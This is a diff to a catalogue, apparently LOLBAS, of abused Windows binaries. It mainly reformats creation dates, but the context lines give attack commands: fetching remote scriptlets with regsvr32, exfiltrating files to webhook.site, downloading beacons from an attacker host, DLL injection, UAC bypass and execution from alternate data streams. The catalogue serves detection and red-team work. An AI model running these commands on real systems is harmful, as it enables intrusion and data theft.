- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
||||||
Description: Add content to an Alternate Data Stream (ADS).
|
Description: Add content to an Alternate Data Stream (ADS).
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Cmdkey.exe
|
Name: Cmdkey.exe
|
||||||
Description: creates, lists, and deletes stored user names and passwords or credentials.
|
Description: creates, lists, and deletes stored user names and passwords or credentials.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cmdkey /list
|
- Command: cmdkey /list
|
||||||
Description: List cached credentials
|
Description: List cached credentials
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Cmstp.exe
|
Name: Cmstp.exe
|
||||||
Description: Installs or removes a Connection Manager service profile.
|
Description: Installs or removes a Connection Manager service profile.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
||||||
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: ConfigSecurityPolicy.exe
|
Name: ConfigSecurityPolicy.exe
|
||||||
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
|
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
|
||||||
Author: 'Ialle Teixeira'
|
Author: 'Ialle Teixeira'
|
||||||
Created: '04/09/2020'
|
Created: 2020-09-04
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
|
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
|
||||||
Description: Upload file, credentials or data exfiltration in general
|
Description: Upload file, credentials or data exfiltration in general
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Control.exe
|
Name: Control.exe
|
||||||
Description: Binary used to launch controlpanel items in Windows
|
Description: Binary used to launch controlpanel items in Windows
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
|
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
|
||||||
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
|
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Csc.exe
|
Name: Csc.exe
|
||||||
Description: Binary file used by .NET to compile C# code
|
Description: Binary file used by .NET to compile C# code
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: csc.exe -out:My.exe File.cs
|
- Command: csc.exe -out:My.exe File.cs
|
||||||
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
|
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Cscript.exe
|
Name: Cscript.exe
|
||||||
Description: Binary used to execute scripts in Windows
|
Description: Binary used to execute scripts in Windows
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cscript c:\ads\file.txt:script.vbs
|
- Command: cscript c:\ads\file.txt:script.vbs
|
||||||
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
|
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Desktopimgdownldr.exe
|
Name: Desktopimgdownldr.exe
|
||||||
Description: Windows binary used to configure lockscreen/desktop image
|
Description: Windows binary used to configure lockscreen/desktop image
|
||||||
Author: Gal Kristal
|
Author: Gal Kristal
|
||||||
Created: 28/06/2020
|
Created: 2020-06-28
|
||||||
Commands:
|
Commands:
|
||||||
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
|
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
|
||||||
Description: Downloads the file and sets it as the computer's lockscreen
|
Description: Downloads the file and sets it as the computer's lockscreen
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Dfsvc.exe
|
Name: Dfsvc.exe
|
||||||
Description: ClickOnce engine in Windows used by .NET
|
Description: ClickOnce engine in Windows used by .NET
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||||
Description: Executes click-once-application from Url
|
Description: Executes click-once-application from Url
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Diantz.exe
|
Name: Diantz.exe
|
||||||
Description: Binary that package existing files into a cabinet (.cab) file
|
Description: Binary that package existing files into a cabinet (.cab) file
|
||||||
Author: 'Tamir Yehuda'
|
Author: 'Tamir Yehuda'
|
||||||
Created: '08/08/2020'
|
Created: 2020-08-08
|
||||||
Commands:
|
Commands:
|
||||||
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
|
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
|
||||||
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
|
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Diskshadow.exe
|
Name: Diskshadow.exe
|
||||||
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
|
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: diskshadow.exe /s c:\test\diskshadow.txt
|
- Command: diskshadow.exe /s c:\test\diskshadow.txt
|
||||||
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
|
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Dnscmd.exe
|
Name: Dnscmd.exe
|
||||||
Description: A command-line interface for managing DNS servers
|
Description: A command-line interface for managing DNS servers
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
||||||
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
|
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Esentutl.exe
|
Name: Esentutl.exe
|
||||||
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
|
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
|
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
|
||||||
Description: Copies the source VBS file to the destination VBS file.
|
Description: Copies the source VBS file to the destination VBS file.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Eventvwr.exe
|
Name: Eventvwr.exe
|
||||||
Description: Displays Windows Event Logs in a GUI window.
|
Description: Displays Windows Event Logs in a GUI window.
|
||||||
Author: 'Jacob Gajek'
|
Author: 'Jacob Gajek'
|
||||||
Created: '2018-11-01'
|
Created: 2018-11-01
|
||||||
Commands:
|
Commands:
|
||||||
- Command: eventvwr.exe
|
- Command: eventvwr.exe
|
||||||
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\eventvwr.exe
|
- Path: C:\Windows\System32\eventvwr.exe
|
||||||
- Path: C:\Windows\SysWOW64\eventvwr.exe
|
- Path: C:\Windows\SysWOW64\eventvwr.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
|
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: eventvwr.exe launching child process other than mmc.exe
|
- IOC: eventvwr.exe launching child process other than mmc.exe
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Expand.exe
|
Name: Expand.exe
|
||||||
Description: Binary that expands one or more compressed files
|
Description: Binary that expands one or more compressed files
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
|
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
|
||||||
Description: Copies source file to destination.
|
Description: Copies source file to destination.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Explorer.exe
|
Name: Explorer.exe
|
||||||
Description: Binary used for managing files and system components within Windows
|
Description: Binary used for managing files and system components within Windows
|
||||||
Author: 'Jai Minton'
|
Author: 'Jai Minton'
|
||||||
Created: '2020-06-24'
|
Created: 2020-06-24
|
||||||
Commands:
|
Commands:
|
||||||
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
|
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
|
||||||
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Extexport.exe
|
Name: Extexport.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Extexport.exe c:\test foo bar
|
- Command: Extexport.exe c:\test foo bar
|
||||||
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
|
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Extrac32.exe
|
Name: Extrac32.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
||||||
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
|
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Findstr.exe
|
Name: Findstr.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
||||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Forfiles.exe
|
Name: Forfiles.exe
|
||||||
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
|
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
|
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
|
||||||
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
|
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Ftp.exe
|
Name: Ftp.exe
|
||||||
Description: A binary designed for connecting to FTP servers
|
Description: A binary designed for connecting to FTP servers
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-12-10'
|
Created: 2018-12-10
|
||||||
Commands:
|
Commands:
|
||||||
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
|
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
|
||||||
Description: Executes the commands you put inside the text file.
|
Description: Executes the commands you put inside the text file.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: GfxDownloadWrapper.exe
|
Name: GfxDownloadWrapper.exe
|
||||||
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
|
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
|
||||||
Author: Jesus Galvez
|
Author: Jesus Galvez
|
||||||
Created: Jesus Galvez
|
Created: 2019-12-27
|
||||||
Commands:
|
Commands:
|
||||||
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
|
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
|
||||||
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
|
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Gpscript.exe
|
Name: Gpscript.exe
|
||||||
Description: Used by group policy to process scripts
|
Description: Used by group policy to process scripts
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Gpscript /logon
|
- Command: Gpscript /logon
|
||||||
Description: Executes logon scripts configured in Group Policy.
|
Description: Executes logon scripts configured in Group Policy.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Hh.exe
|
Name: Hh.exe
|
||||||
Description: Binary used for processing chm files in Windows
|
Description: Binary used for processing chm files in Windows
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: HH.exe http://some.url/script.ps1
|
- Command: HH.exe http://some.url/script.ps1
|
||||||
Description: Open the target PowerShell script with HTML Help.
|
Description: Open the target PowerShell script with HTML Help.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Ie4uinit.exe
|
Name: Ie4uinit.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ie4uinit.exe -BaseSettings
|
- Command: ie4uinit.exe -BaseSettings
|
||||||
Description: Executes commands from a specially prepared ie4uinit.inf file.
|
Description: Executes commands from a specially prepared ie4uinit.inf file.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Ieexec.exe
|
Name: Ieexec.exe
|
||||||
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
|
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||||
Description: Downloads and executes bypass.exe from the remote server.
|
Description: Downloads and executes bypass.exe from the remote server.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Ilasm.exe
|
Name: Ilasm.exe
|
||||||
Description: used for compile c# code into dll or exe.
|
Description: used for compile c# code into dll or exe.
|
||||||
Author: Hai vaknin (lux)
|
Author: Hai vaknin (lux)
|
||||||
Created: 17/03/2020
|
Created: 2020-03-17
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ilasm.exe C:\public\test.txt /exe
|
- Command: ilasm.exe C:\public\test.txt /exe
|
||||||
Description: Binary file used by .NET to compile c# code to .exe
|
Description: Binary file used by .NET to compile c# code to .exe
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Infdefaultinstall.exe
|
Name: Infdefaultinstall.exe
|
||||||
Description: Binary used to perform installation based on content inside inf files
|
Description: Binary used to perform installation based on content inside inf files
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
|
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
|
||||||
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
|
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Installutil.exe
|
Name: Installutil.exe
|
||||||
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
|
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||||
Description: Execute the target .NET DLL or EXE.
|
Description: Execute the target .NET DLL or EXE.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Jsc.exe
|
Name: Jsc.exe
|
||||||
Description: Binary file used by .NET to compile javascript code to .exe or .dll format
|
Description: Binary file used by .NET to compile javascript code to .exe or .dll format
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2019-05-31'
|
Created: 2019-05-31
|
||||||
Commands:
|
Commands:
|
||||||
- Command: jsc.exe scriptfile.js
|
- Command: jsc.exe scriptfile.js
|
||||||
Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
|
Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Makecab.exe
|
Name: Makecab.exe
|
||||||
Description: Binary to package existing files into a cabinet (.cab) file
|
Description: Binary to package existing files into a cabinet (.cab) file
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
|
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
|
||||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Mavinject.exe
|
Name: Mavinject.exe
|
||||||
Description: Used by App-v in Windows
|
Description: Used by App-v in Windows
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
|
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
|
||||||
Description: Inject evil.dll into a process with PID 3110.
|
Description: Inject evil.dll into a process with PID 3110.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Microsoft.Workflow.Compiler.exe
|
Name: Microsoft.Workflow.Compiler.exe
|
||||||
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
|
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
|
||||||
Author: 'Conor Richard'
|
Author: 'Conor Richard'
|
||||||
Created: '2018-10-22'
|
Created: 2018-10-22
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
|
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
|
||||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
|
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Mmc.exe
|
Name: Mmc.exe
|
||||||
Description: Load snap-ins to locally and remotely manage Windows systems
|
Description: Load snap-ins to locally and remotely manage Windows systems
|
||||||
Author: '@bohops'
|
Author: '@bohops'
|
||||||
Created: '2018-12-04'
|
Created: 2018-12-04
|
||||||
Commands:
|
Commands:
|
||||||
- Command: mmc.exe -Embedding c:\path\to\test.msc
|
- Command: mmc.exe -Embedding c:\path\to\test.msc
|
||||||
Description: Launch a 'backgrounded' MMC process and invoke a COM payload
|
Description: Launch a 'backgrounded' MMC process and invoke a COM payload
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: MpCmdRun.exe
|
Name: MpCmdRun.exe
|
||||||
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
|
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '09/03/2020'
|
Created: 2020-03-20
|
||||||
Commands:
|
Commands:
|
||||||
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
|
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
|
||||||
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
|
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Msbuild.exe
|
Name: Msbuild.exe
|
||||||
Description: Used to compile and execute code
|
Description: Used to compile and execute code
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: msbuild.exe pshell.xml
|
- Command: msbuild.exe pshell.xml
|
||||||
Description: Build and execute a C# project stored in the target XML file.
|
Description: Build and execute a C# project stored in the target XML file.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Msconfig.exe
|
Name: Msconfig.exe
|
||||||
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
|
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Msconfig.exe -5
|
- Command: Msconfig.exe -5
|
||||||
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
|
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Msdt.exe
|
Name: Msdt.exe
|
||||||
Description: Microsoft diagnostics tool
|
Description: Microsoft diagnostics tool
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Mshta.exe
|
Name: Mshta.exe
|
||||||
Description: Used by Windows to execute html applications. (.hta)
|
Description: Used by Windows to execute html applications. (.hta)
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: mshta.exe evilfile.hta
|
- Command: mshta.exe evilfile.hta
|
||||||
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Msiexec.exe
|
Name: Msiexec.exe
|
||||||
Description: Used by Windows to execute msi files
|
Description: Used by Windows to execute msi files
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: msiexec /quiet /i cmd.msi
|
- Command: msiexec /quiet /i cmd.msi
|
||||||
Description: Installs the target .MSI file silently.
|
Description: Installs the target .MSI file silently.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Netsh.exe
|
Name: Netsh.exe
|
||||||
Description: Netsh is a Windows tool used to manipulate network interface settings.
|
Description: Netsh is a Windows tool used to manipulate network interface settings.
|
||||||
Author: 'Freddie Barr-Smith'
|
Author: 'Freddie Barr-Smith'
|
||||||
Created: '2019-12-24'
|
Created: 2019-12-24
|
||||||
Commands:
|
Commands:
|
||||||
- Command: netsh.exe add helper C:\Users\User\file.dll
|
- Command: netsh.exe add helper C:\Users\User\file.dll
|
||||||
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
|
